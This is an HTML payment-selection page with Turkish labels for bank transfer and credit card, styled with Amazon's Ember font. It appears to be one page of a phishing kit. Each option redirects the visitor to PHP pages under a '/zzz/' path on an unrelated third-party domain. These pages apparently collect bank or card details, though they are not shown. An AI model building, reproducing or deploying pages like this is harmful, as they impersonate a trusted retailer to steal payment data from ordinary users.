<!DOCTYPE html>
<html lang="en" >

<head>
  <meta charset="UTF-8">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>
    <meta name="apple-mobile-web-app-title" content="CodePen">
    <title>sec</title>
    <link href="https://db.onlinewebfonts.com/c/157c6cc36dd65b1b2adc9e7f3329c761?family=Amazon+Ember+Regular" rel="stylesheet">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css">

  
  
<style>img.payment-select-image {
  width: 55px;
}
.container {
  width: 54%;
  margin: 0 auto;
}

.payment-select {
  margin-top: 10px;
  width: 100%;
  border: 1px solid #ddd;
  padding: 1em;
}
.payment-select-header {
  display: flex;
  justify-content: space-between;
  align-items: center;
}
.payment-select-image {
  width: 130px;
}@import url(https://fonts.googleapis.com/css2?family=Droid+Sans:ital,wght@0,100;0,300;0,400;0,500;0,700;0,900;1,100;1,300;1,400;1,500;1,700;1,900&display=swap);

div div label {
  font-family: "Amazon Ember Regular";
  font-weight: 600;
  font-style: normal;
  margin-left: 1px
  font-size: 14px;
  
}  html body {
  margin-left: -39px;
}

#debito {
  width: 34px;
  height: 17px;
}

#credito {
  width: 34px;
  height: 17px;
}

div.payment-select {
  border-style: groove; 
      background: #cccccc;
  border-top-width: 2px;
  border-right-width: 2px;
  border-left-width: 2px;
  border-bottom-width: 2px
  
}html body {
  background-color: #f3f3f3;
  width: 380px;
  height: 1045px
  
}
</style>

 
  
  
</head>

<body translate="no">
  <div class="container">
    <form action="">
      <div class="payment">
          <div class="payment-select" onclick="redirectPage('https://ajansdesire.com/zzz/kayit.php')">
              <div class="payment-select-header">
                  <div class="payment-select-radio">
                      <input type="radio"  id="debito" name="pay" value="debito"> 
                      <label for="debito">HAVALE/EFT</label>
                  </div>
                  <div class="payment-select-logo">
                      <img src="./logobank.png" alt="" class="payment-select-image">
                  </div>
              </div>
          </div>
          <div class="payment-select"  onclick="redirectPage('https://ajansdesire.com/zzz/index5.php')">
              <div class="payment-select-header">
                  <div class="payment-select-radio">
                      <input type="radio"  id="credito" name="pay" value="credito"> 
                      <label for="credito">KREDİ KARTI</label>
                  </div>
                  <div class="payment-select-logo">
                      <img src="logocard.png" alt="" class="payment-select-image">
                  </div>
              </div>
          </div>
      </div>
     
  </form>
  
 
</div>
<script>
    function redirectPage(url) {
        const debitoSelected = document.getElementById("debito").checked;
        const creditoSelected = document.getElementById("credito").checked;

        if (debitoSelected) {
            window.location.href = url;
        } else if (creditoSelected) {
            window.location.href = url;
        } else {
            
        }
    }
</script>  
  
  
</body>

</html>
